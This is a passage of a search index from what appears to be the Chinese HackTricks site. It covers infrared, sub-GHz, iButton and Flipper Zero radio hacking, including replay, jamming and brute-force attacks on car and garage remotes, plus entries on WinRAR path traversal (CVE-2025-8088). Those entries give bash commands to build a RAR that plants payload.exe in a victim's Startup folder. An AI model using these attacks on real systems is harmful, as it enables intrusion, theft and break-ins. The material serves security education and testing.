。最著名的有RC5和NEC。不幸的是,最著名 并不意味着最常见 。在我的环境中,我只遇到过两个NEC遥控器,而没有RC5的。 制造商喜欢使用自己独特的红外协议,即使在同一类设备(例如,电视盒)中也是如此。因此,不同公司的遥控器,有时甚至是同一公司的不同型号,无法与同类设备配合使用。","breadcrumbs":"Radio Hacking » Infrared » 红外协议的多样性","id":"10340","title":"红外协议的多样性"},"10341":{"body":"查看遥控器红外信号的最可靠方法是使用示波器。它不会解调或反转接收到的信号,而是“原样”显示。这对于测试和调试非常有用。我将以NEC红外协议为例展示预期信号。 通常,编码数据包的开头有一个前导码。这使接收器能够确定增益和背景水平。也有没有前导码的协议,例如,夏普。 然后传输数据。结构、前导码和位编码方法由特定协议决定。 NEC红外协议 包含一个短命令和一个重复码,在按下按钮时发送。命令和重复码在开头都有相同的前导码。 NEC 命令 除了前导码外,还由一个地址字节和一个命令编号字节组成,设备通过这些字节理解需要执行的操作。地址和命令编号字节用反向值进行重复,以检查传输的完整性。命令末尾有一个额外的停止位。 重复码 在前导码后有一个“1”,这是一个停止位。 对于 逻辑“0”和“1” ,NEC使用脉冲间距编码:首先传输一个脉冲爆发,然后是一个暂停,其长度设置位的值。","breadcrumbs":"Radio Hacking » Infrared » 探索红外信号","id":"10341","title":"探索红外信号"},"10342":{"body":"与其他遥控器不同, 空调不仅仅传输按下按钮的代码 。它们还 在按下按钮时传输所有信息 ,以确保 空调和遥控器同步 。 这将避免将设置为20ºC的机器在使用一个遥控器时增加到21ºC,然后当使用另一个仍将温度设置为20ºC的遥控器进一步增加温度时,它会“增加”到21ºC(而不是22ºC,认为它在21ºC)。","breadcrumbs":"Radio Hacking » Infrared » 空调","id":"10342","title":"空调"},"10343":{"body":"您可以使用Flipper Zero攻击红外线: FZ - Infrared","breadcrumbs":"Radio Hacking » Infrared » 攻击与攻防研究","id":"10343","title":"攻击与攻防研究"},"10344":{"body":"最近的学术研究(EvilScreen,2022)表明, 结合红外和蓝牙或Wi-Fi的多通道遥控器可以被滥用以完全劫持现代智能电视 。该攻击链将高权限的红外服务代码与经过身份验证的蓝牙数据包结合在一起,绕过通道隔离,允许任意应用程序启动、麦克风激活或在没有物理访问的情况下恢复出厂设置。来自不同供应商的八款主流电视——包括声称符合ISO/IEC 27001标准的三星型号——被确认存在漏洞。缓解措施需要供应商的固件修复或完全禁用未使用的红外接收器。","breadcrumbs":"Radio Hacking » Infrared » 智能电视/机顶盒接管(EvilScreen)","id":"10344","title":"智能电视/机顶盒接管(EvilScreen)"},"10345":{"body":"安全摄像头、路由器甚至恶意USB闪存驱动器通常包括 夜视红外LED 。研究表明,恶意软件可以调制这些LED(<10–20 kbit/s,使用简单的OOK)以 通过墙壁和窗户外泄秘密 到放置在数十米外的外部摄像头。由于光线在可见光谱之外,操作员很少注意到。对策: 在敏感区域物理屏蔽或移除红外LED 监控摄像头LED的占空比和固件完整性 在窗户和监控摄像头上部署红外切割滤光片 攻击者还可以使用强大的红外投影仪通过闪烁数据向不安全的摄像头 渗透 命令。","breadcrumbs":"Radio Hacking » Infrared » 通过红外LED进行空气间隔数据外泄(aIR-Jumper家族)","id":"10345","title":"通过红外LED进行空气间隔数据外泄(aIR-Jumper家族)"},"10346":{"body":"固件1.0(2024年9月)增加了 数十种额外的红外协议和可选的外部放大模块 。结合通用遥控器的暴力破解模式,Flipper可以在高功率二极管的帮助下,从最多30米的距离禁用或重新配置大多数公共电视/空调。","breadcrumbs":"Radio Hacking » Infrared » 使用Flipper Zero 1.0进行远程暴力破解和扩展协议","id":"10346","title":"使用Flipper Zero 1.0进行远程暴力破解和扩展协议"},"10347":{"body":"","breadcrumbs":"Radio Hacking » Infrared » 工具与实用示例","id":"10347","title":"工具与实用示例"},"10348":{"body":"Flipper Zero – 便携式收发器,具有学习、重放和字典暴力破解模式(见上文)。 Arduino / ESP32 + 红外LED / TSOP38xx接收器 – 便宜的DIY分析仪/发射器。与Arduino-IRremote库结合使用(v4.x支持>40种协议)。 逻辑分析仪 (Saleae/FX2) – 在协议未知时捕获原始时序。 带红外发射器的智能手机 (例如,小米) – 快速现场测试,但范围有限。","breadcrumbs":"Radio Hacking » Infrared » 硬件","id":"10348","title":"硬件"},"10349":{"body":"Arduino-IRremote – 积极维护的C++库: cpp #include \\nIRsend sender;\\nvoid setup(){ sender.begin(); }\\nvoid loop(){\\nsender.sendNEC(0x20DF10EF, 32); // 三星电视电源\\ndelay(5000);\\n} IRscrutinizer / AnalysIR – GUI解码器,导入原始捕获并自动识别协议 + 生成Pronto/Arduino代码。 LIRC / ir-keytable(Linux) – 从命令行接收和注入红外: bash sudo ir-keytable -p nec,rc5 -t # 实时转储解码的扫描代码\\nirsend SEND_ONCE samsung KEY_POWER","breadcrumbs":"Radio Hacking » Infrared » 软件","id":"10349","title":"软件"},"1035":{"body":"许多归档格式(ZIP、RAR、TAR、7-ZIP等)允许每个条目携带其自己的 内部路径 。当提取工具盲目地尊重该路径时,包含..或 绝对路径 (例如C:\\\\Windows\\\\System32\\\\)的构造文件名将被写入用户选择的目录之外。 这种类型的漏洞被广泛称为 Zip-Slip 或 归档提取路径遍历 。 后果从覆盖任意文件到通过在 自动运行 位置(如Windows 启动 文件夹)放置有效载荷直接实现 远程代码执行(RCE) 。","breadcrumbs":"Archive Extraction Path Traversal » 概述","id":"1035","title":"概述"},"10350":{"body":"在不需要时禁用或覆盖公共场所部署设备上的红外接收器。 强制智能电视和遥控器之间的 配对 或加密检查;隔离特权“服务”代码。 在机密区域周围部署红外切割滤光片或连续波探测器,以打破光学隐蔽通道。 监控暴露可控红外LED的摄像头/物联网设备的固件完整性。","breadcrumbs":"Radio Hacking » Infrared » 防御措施","id":"10350","title":"防御措施"},"10351":{"body":"Flipper Zero红外博客文章 EvilScreen:通过遥控器模仿劫持智能电视(arXiv 2210.03014) tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Infrared » 参考文献","id":"10351","title":"参考文献"},"10352":{"body":"Reading time: 10 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Sub-GHz RF » Sub-GHz RF","id":"10352","title":"Sub-GHz RF"},"10353":{"body":"车库门开启器通常在300-190 MHz范围内工作,最常见的频率为300 MHz、310 MHz、315 MHz和390 MHz。这个频率范围通常用于车库门开启器,因为它比其他频段更不拥挤,并且不太可能受到其他设备的干扰。","breadcrumbs":"Radio Hacking » Sub-GHz RF » Garage Doors","id":"10353","title":"Garage Doors"},"10354":{"body":"大多数汽车钥匙遥控器工作在 315 MHz或433 MHz 。这两者都是无线电频率,广泛用于不同的应用。两个频率之间的主要区别是433 MHz的范围比315 MHz更长。这意味着433 MHz更适合需要更长范围的应用,例如远程无钥匙进入。 在欧洲,常用433.92MHz,而在美国和日本则是315MHz。","breadcrumbs":"Radio Hacking » Sub-GHz RF » Car Doors","id":"10354","title":"Car Doors"},"10355":{"body":"如果不将每个代码发送5次(这样发送是为了确保接收器能接收到),而只发送一次,时间将减少到6分钟: 如果你 去掉信号之间的2毫秒等待 时间,你可以 将时间减少到3分钟。 此外,通过使用De Bruijn序列(减少发送所有潜在二进制数字所需的位数的方法),这个 时间仅减少到8秒 : 此攻击的示例已在 https://github.com/samyk/opensesame 中实现。 要求 前导码将避免De Bruijn序列 优化, 滚动代码将防止此攻击 (假设代码足够长,不易被暴力破解)。","breadcrumbs":"Radio Hacking » Sub-GHz RF » Brute-force Attack","id":"10355","title":"Brute-force Attack"},"10356":{"body":"要攻击这些信号,请使用Flipper Zero检查: FZ - Sub-GHz","breadcrumbs":"Radio Hacking » Sub-GHz RF » Sub-GHz Attack","id":"10356","title":"Sub-GHz Attack"},"10357":{"body":"自动车库门开启器通常使用无线遥控器来打开和关闭车库门。遥控器 发送无线电频率(RF)信号 到车库门开启器,激活电机以打开或关闭门。 有人可能会使用称为代码抓取器的设备来拦截RF信号并记录以备后用。这被称为 重放攻击 。为了防止这种攻击,许多现代车库门开启器使用一种更安全的加密方法,称为 滚动代码 系统。 RF信号通常使用滚动代码传输 ,这意味着代码在每次使用时都会更改。这使得 拦截 信号并 利用 它获得 未经授权 访问车库变得 困难 。 在滚动代码系统中,遥控器和车库门开启器有一个 共享算法 ,每次使用遥控器时 生成一个新代码 。车库门开启器只会对 正确代码 做出响应,这使得仅通过捕获代码就获得未经授权的访问变得更加困难。","breadcrumbs":"Radio Hacking » Sub-GHz RF » Rolling Codes Protection","id":"10357","title":"Rolling Codes Protection"},"10358":{"body":"基本上,你监听按钮并 在遥控器超出设备范围时捕获信号 (比如汽车或车库)。然后你移动到设备并 使用捕获的代码打开它 。","breadcrumbs":"Radio Hacking » Sub-GHz RF » Missing Link Attack","id":"10358","title":"Missing Link Attack"},"10359":{"body":"攻击者可以 在车辆或接收器附近干扰信号 ,使得 接收器无法真正“听到”代码 ,一旦发生这种情况,你可以简单地 捕获并重放 代码,当你停止干扰时。 受害者在某个时刻会使用 钥匙锁定汽车 ,但攻击者将 记录足够的“关门”代码 ,希望能够重新发送以打开门(可能需要 更改频率 ,因为有些汽车使用相同的代码来打开和关闭,但在不同频率下监听两个命令)。 warning 干扰有效 ,但很明显,因为如果 锁车的人只是测试车门 以确保它们被锁定,他们会注意到汽车未锁。此外,如果他们意识到这种攻击,他们甚至可以听到车门在按下“锁定”按钮时没有发出锁定 声音 ,或者汽车的 灯光 在按下“锁定”按钮时没有闪烁。","breadcrumbs":"Radio Hacking » Sub-GHz RF » Full Link Jamming Attack","id":"10359","title":"Full Link Jamming Attack"},"1036":{"body":"攻击者创建一个归档,其中一个或多个文件头包含: 相对遍历序列(..\\\\..\\\\..\\\\Users\\\\\\\\victim\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\Startup\\\\\\\\payload.exe) 绝对路径(C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\payload.exe) 受害者使用一个信任嵌入路径而不是对其进行清理或强制在所选目录下提取的易受攻击工具提取归档。 文件被写入攻击者控制的位置,并在系统或用户下次触发该路径时执行/加载。","breadcrumbs":"Archive Extraction Path Traversal » 根本原因","id":"1036","title":"根本原因"},"10360":{"body":"这是一种更 隐蔽的干扰技术 。攻击者将干扰信号,因此当受害者尝试锁门时将无法工作,但攻击者会 记录此代码 。然后,受害者将 再次尝试锁定汽车 ,按下按钮,汽车将 记录第二个代码 。 紧接着, 攻击者可以发送第一个代码 ,然后 汽车将锁定 (受害者会认为第二次按下锁定了)。然后,攻击者将能够 发送第二个被盗代码以打开 汽车(假设**“关车”代码也可以用来打开它**)。可能需要更改频率(因为有些汽车使用相同的代码来打开和关闭,但在不同频率下监听两个命令)。 攻击者可以 干扰汽车接收器而不是他的接收器 ,因为如果汽车接收器在例如1MHz宽带中监听,攻击者不会 干扰 遥控器使用的确切频率,而是 在该频谱中接近的频率 ,同时 攻击者的接收器将在更小的范围内监听 ,以便在没有干扰信号的情况下监听遥控信号。 warning 其他实施方案在规格中显示, 滚动代码是发送的总代码的一部分 。即发送的代码是一个 24位密钥 ,其中前 12位是滚动代码 , 第二个8位是命令 (如锁定或解锁),最后4位是 校验和 。实施这种类型的车辆也自然容易受到攻击,因为攻击者只需替换滚动代码段即可 在两个频率上使用任何滚动代码 。 caution 请注意,如果受害者在攻击者发送第一个代码时发送第三个代码,则第一个和第二个代码将失效。","breadcrumbs":"Radio Hacking » Sub-GHz RF » Code Grabbing Attack ( aka ‘RollJam’ )","id":"10360","title":"Code Grabbing Attack ( aka ‘RollJam’ )"},"10361":{"body":"针对安装在汽车上的后市场滚动代码系统进行测试, 立即发送相同的代码两次 会 激活警报 和防盗装置,提供了一个独特的 拒绝服务 机会。讽刺的是, 禁用警报 和防盗装置的方法是 按下 遥控器,这使得攻击者能够 持续执行DoS攻击 。或者将此攻击与 前一个攻击混合以获取更多代码 ,因为受害者希望尽快停止攻击。","breadcrumbs":"Radio Hacking » Sub-GHz RF » Alarm Sounding Jamming Attack","id":"10361","title":"Alarm Sounding Jamming Attack"},"10362":{"body":"https://www.americanradioarchives.com/what-radio-frequency-does-car-key-fobs-run-on/ https://www.andrewmohawk.com/2016/02/05/bypassing-rolling-code-systems/ https://samy.pl/defcon2015/ https://hackaday.io/project/164566-how-to-hack-a-car/details tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Sub-GHz RF » References","id":"10362","title":"References"},"10363":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » iButton » iButton","id":"10363","title":"iButton"},"10364":{"body":"iButton 是一种电子识别密钥的通用名称,装在一个 硬币形状的金属容器 中。它也被称为 Dallas Touch Memory 或接触式存储器。尽管它常常被错误地称为“磁性”密钥,但里面 没有任何磁性 。实际上,里面隐藏着一个完整的 微芯片 ,它在数字协议上运行。","breadcrumbs":"Radio Hacking » iButton » Intro","id":"10364","title":"Intro"},"10365":{"body":"通常,iButton 指的是密钥和读卡器的物理形式 - 一个带有两个接触点的圆形硬币。对于其周围的框架,有许多变体,从最常见的带孔塑料支架到戒指、挂件等。 当密钥接触到读卡器时, 接触点接触 ,密钥被供电以 传输 其 ID。有时密钥 不会立即被读取 ,因为 对讲机的接触 PSD 较大 。因此,密钥和读卡器的外轮廓无法接触。如果是这种情况,您需要将密钥按在读卡器的一个侧面上。","breadcrumbs":"Radio Hacking » iButton » What is iButton?","id":"10365","title":"What is iButton?"},"10366":{"body":"Dallas 密钥使用 1-wire 协议交换数据。仅用一个接触点进行数据传输 (!!),双向传输,从主设备到从设备,反之亦然。1-wire 协议按照主从模型工作。在这种拓扑中,主设备始终发起通信,从设备遵循其指令。 当密钥(从设备)接触到对讲机(主设备)时,密钥内部的芯片开启,由对讲机供电,密钥被初始化。随后,对讲机请求密钥 ID。接下来,我们将更详细地查看这个过程。 Flipper 可以在主模式和从模式下工作。在密钥读取模式下,Flipper 充当读卡器,也就是说它作为主设备工作。而在密钥仿真模式下,Flipper 假装是一个密钥,处于从模式。","breadcrumbs":"Radio Hacking » iButton » 1-Wire protocol","id":"10366","title":"1-Wire protocol"},"10367":{"body":"有关这些密钥如何工作的更多信息,请查看页面 https://blog.flipperzero.one/taming-ibutton/","breadcrumbs":"Radio Hacking » iButton » Dallas, Cyfral & Metakom keys","id":"10367","title":"Dallas, Cyfral & Metakom keys"},"10368":{"body":"iButtons 可以通过 Flipper Zero 进行攻击: FZ - iButton","breadcrumbs":"Radio Hacking » iButton » Attacks","id":"10368","title":"Attacks"},"10369":{"body":"https://blog.flipperzero.one/taming-ibutton/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » iButton » References","id":"10369","title":"References"},"1037":{"body":"WinRAR for Windows(包括rar / unrar CLI、DLL和便携源)在提取过程中未能验证文件名。 一个包含条目的恶意RAR归档,例如: text ..\\\\..\\\\..\\\\Users\\\\victim\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\payload.exe 将最终 位于 所选输出目录之外,并位于用户的 启动 文件夹内。登录后,Windows会自动执行其中的所有内容,从而提供 持久 RCE。","breadcrumbs":"Archive Extraction Path Traversal » 真实案例 – WinRAR ≤ 7.12 (CVE-2025-8088)","id":"1037","title":"真实案例 – WinRAR ≤ 7.12 (CVE-2025-8088)"},"10370":{"body":"Reading time: 2 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 使用 Flipper Zero 你可以: 监听/捕获/重放无线电频率: Sub-GHz 读取/捕获/模拟 NFC 卡: NFC 读取/捕获/模拟 125kHz 标签: 125kHz RFID 读取/捕获/发送红外信号: Infrared 读取/捕获/模拟 iButtons: iButton 用作 Bad USB 用作安全密钥 (U2F) 玩贪吃蛇 其他 Flipper Zero 资源在 https://github.com/djsime1/awesome-flipperzer tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » Flipper Zero","id":"10370","title":"Flipper Zero"},"10371":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - NFC » FZ - NFC","id":"10371","title":"FZ - NFC"},"10372":{"body":"有关RFID和NFC的信息,请查看以下页面: Pentesting RFID","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - NFC » Intro","id":"10372","title":"Intro"},"10373":{"body":"caution 除了NFC卡,Flipper Zero还支持 其他类型的高频卡 ,例如几种 Mifare Classic和Ultralight以及 NTAG 。 新的NFC卡类型将被添加到支持的卡列表中。Flipper Zero支持以下 NFC卡类型A (ISO 14443A): 银行卡(EMV) — 仅读取UID、SAK和ATQA而不保存。 未知卡 — 读取(UID、SAK、ATQA)并模拟UID。 对于 NFC卡类型B、F和V ,Flipper Zero能够读取UID而不保存。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - NFC » Supported NFC cards","id":"10373","title":"Supported NFC cards"},"10374":{"body":"Bank card (EMV) Flipper Zero只能读取银行卡的UID、SAK、ATQA和存储数据 而不保存 。 银行卡读取屏幕对于银行卡,Flipper Zero只能读取数据 而不保存和模拟 。 Unknown cards 当Flipper Zero 无法确定NFC卡的类型 时,仅能 读取和保存UID、SAK和ATQA 。 未知卡读取屏幕对于未知NFC卡,Flipper Zero只能模拟UID。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - NFC » NFC cards type A","id":"10374","title":"NFC cards type A"},"10375":{"body":"对于 NFC卡类型B、F和V ,Flipper Zero只能 读取和显示UID 而不保存。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - NFC » NFC cards types B, F, and V","id":"10375","title":"NFC cards types B, F, and V"},"10376":{"body":"有关NFC的介绍 请阅读此页面 。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - NFC » Actions","id":"10376","title":"Actions"},"10377":{"body":"Flipper Zero可以 读取NFC卡 ,但是它 不理解所有基于ISO 14443的协议 。然而,由于 UID是一个低级属性 ,您可能会发现自己处于一种情况,即 UID已经被读取,但高级数据传输协议仍然未知 。您可以使用Flipper读取、模拟和手动输入UID,以便为使用UID进行授权的原始读取器。 Reading the UID VS Reading the Data Inside 在Flipper中,读取13.56 MHz标签可以分为两个部分: 低级读取 — 仅读取UID、SAK和ATQA。Flipper尝试根据从卡片读取的数据猜测高级协议。您不能对此100%确定,因为这只是基于某些因素的假设。 高级读取 — 使用特定的高级协议从卡片的内存中读取数据。这将是读取Mifare Ultralight上的数据、从Mifare Classic读取扇区,或从PayPass/Apple Pay读取卡片的属性。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - NFC » Read","id":"10377","title":"Read"},"10378":{"body":"如果Flipper Zero无法从低级数据中找到卡片类型,在Extra Actions中,您可以选择Read Specific Card Type并 手动****指明您想要读取的卡片类型 。 EMV Bank Cards (PayPass, payWave, Apple Pay, Google Pay) 除了简单地读取UID,您还可以从银行卡中提取更多数据。可以 获取完整的卡号 (卡片正面的16位数字)、 有效期 ,在某些情况下甚至可以获取 持卡人姓名 以及 最近交易 的列表。 但是,您 无法通过这种方式读取CVV (卡片背面的3位数字)。此外, 银行卡受到重放攻击的保护 ,因此使用Flipper复制后再尝试模拟支付是行不通的。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - NFC » Read Specific","id":"10378","title":"Read Specific"},"10379":{"body":"https://blog.flipperzero.one/rfid/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - NFC » References","id":"10379","title":"References"},"1038":{"body":"bash # Requires rar >= 6.x\\nmkdir -p \\"evil/../../../Users/Public/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup\\"\\ncp payload.exe \\"evil/../../../Users/Public/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/\\"\\nrar a -ep evil.rar evil/* 选项使用: -ep – 按照给定的方式存储文件路径( 不 修剪前导 ./)。 将 evil.rar 交给受害者,并指示他们使用易受攻击的 WinRAR 版本进行解压。","breadcrumbs":"Archive Extraction Path Traversal » 制作 PoC 压缩档案 (Linux/Mac)","id":"1038","title":"制作 PoC 压缩档案 (Linux/Mac)"},"10380":{"body":"Reading time: 7 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » FZ - Sub-GHz","id":"10380","title":"FZ - Sub-GHz"},"10381":{"body":"Flipper Zero 可以 接收和发送 300-928 MHz 范围内的无线电频率 ,其内置模块可以读取、保存和模拟遥控器。这些遥控器用于与门、障碍物、无线电锁、遥控开关、无线门铃、智能灯等进行交互。Flipper Zero 可以帮助您了解您的安全性是否受到威胁。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » Intro","id":"10381","title":"Intro"},"10382":{"body":"Flipper Zero 具有基于   CC1101 芯片 的内置 sub-1 GHz 模块和一根无线电天线(最大范围为 50 米)。CC1101 芯片和天线均设计用于在 300-348 MHz、387-464 MHz 和 779-928 MHz 频段内工作。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » Sub-GHz hardware","id":"10382","title":"Sub-GHz hardware"},"10383":{"body":"","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » Actions","id":"10383","title":"Actions"},"10384":{"body":"note 如何找到遥控器使用的频率 在分析时,Flipper Zero 正在扫描频率配置中所有可用频率的信号强度 (RSSI)。Flipper Zero 显示 RSSI 值最高的频率,信号强度高于 -90 dBm 。 要确定遥控器的频率,请执行以下操作: 将遥控器放置在 Flipper Zero 左侧非常靠近的位置。 转到 主菜单 → Sub-GHz 。 选择 频率分析仪 ,然后按住您想要分析的遥控器上的按钮。 查看屏幕上的频率值。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » Frequency Analyser","id":"10384","title":"Frequency Analyser"},"10385":{"body":"note 查找使用的频率信息(也是查找使用频率的另一种方法) 读取 选项 在配置的频率上监听 ,默认调制为 433.92 AM。如果在读取时 发现了某些内容 ,则 屏幕上会提供信息 。这些信息可以用于将来复制信号。 在使用读取时,可以按 左按钮 并 进行配置 。 此时它有 4 种调制方式 (AM270、AM650、FM328 和 FM476),并存储了 几个相关频率 : 您可以设置 任何您感兴趣的频率 ,但是,如果您 不确定遥控器使用的频率 ,请 将跳频设置为开启 (默认关闭),并多次按下按钮,直到 Flipper 捕获到它并提供您设置频率所需的信息。 caution 在频率之间切换需要一些时间,因此在切换时传输的信号可能会丢失。为了更好的信号接收,请设置由频率分析仪确定的固定频率。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » Read","id":"10385","title":"Read"},"10386":{"body":"note 在配置的频率上窃取(并重放)信号 读取原始 选项 记录在监听频率上发送的信号 。这可以用于 窃取 信号并 重复 它。 默认情况下 读取原始也在 433.92 AM650 ,但如果通过读取选项发现您感兴趣的信号在 不同的频率/调制中,您也可以通过按左键进行修改 (在读取原始选项内)。","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » Read Raw","id":"10386","title":"Read Raw"},"10387":{"body":"如果您知道例如车库门使用的协议,可以 生成所有代码并通过 Flipper Zero 发送它们。 这是一个支持一般常见类型车库的示例: https://github.com/tobiabocchi/flipperzero-bruteforce","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » Brute-Force","id":"10387","title":"Brute-Force"},"10388":{"body":"note 从配置的协议列表中添加信号 支持的协议 列表 Princeton_433 (适用于大多数静态代码系统) 433.92 静态 Nice Flo 12bit_433 433.92 静态 Nice Flo 24bit_433 433.92 静态 CAME 12bit_433 433.92 静态 CAME 24bit_433 433.92 静态 Linear_300 300.00 静态 CAME TWEE 433.92 静态 Gate TX_433 433.92 静态 DoorHan_315 315.00 动态 DoorHan_433 433.92 动态 LiftMaster_315 315.00 动态 LiftMaster_390 390.00 动态 Security+2.0_310 310.00 动态 Security+2.0_315 315.00 动态 Security+2.0_390 390.00 动态","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » Add Manually","id":"10388","title":"Add Manually"},"10389":{"body":"查看 https://docs.flipperzero.one/sub-ghz/supported-vendors 中的列表","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » 支持的 Sub-GHz 供应商","id":"10389","title":"支持的 Sub-GHz 供应商"},"1039":{"body":"ESET 报告了 RomCom (Storm-0978/UNC2596) 针对 RAR 压缩文件的网络钓鱼活动,利用 CVE-2025-8088 部署定制的后门并促进勒索软件操作。","breadcrumbs":"Archive Extraction Path Traversal » 观察到的实际利用","id":"1039","title":"观察到的实际利用"},"10390":{"body":"查看 https://docs.flipperzero.one/sub-ghz/frequencies 中的列表","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » 按地区支持的频率","id":"10390","title":"按地区支持的频率"},"10391":{"body":"note 获取保存频率的 dBms","breadcrumbs":"Radio Hacking » Flipper Zero » FZ - Sub-GHz » Test","id":"10391","title":"Test"},"10392":{"body":"https://docs.flipperzero.one/sub-ghz tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 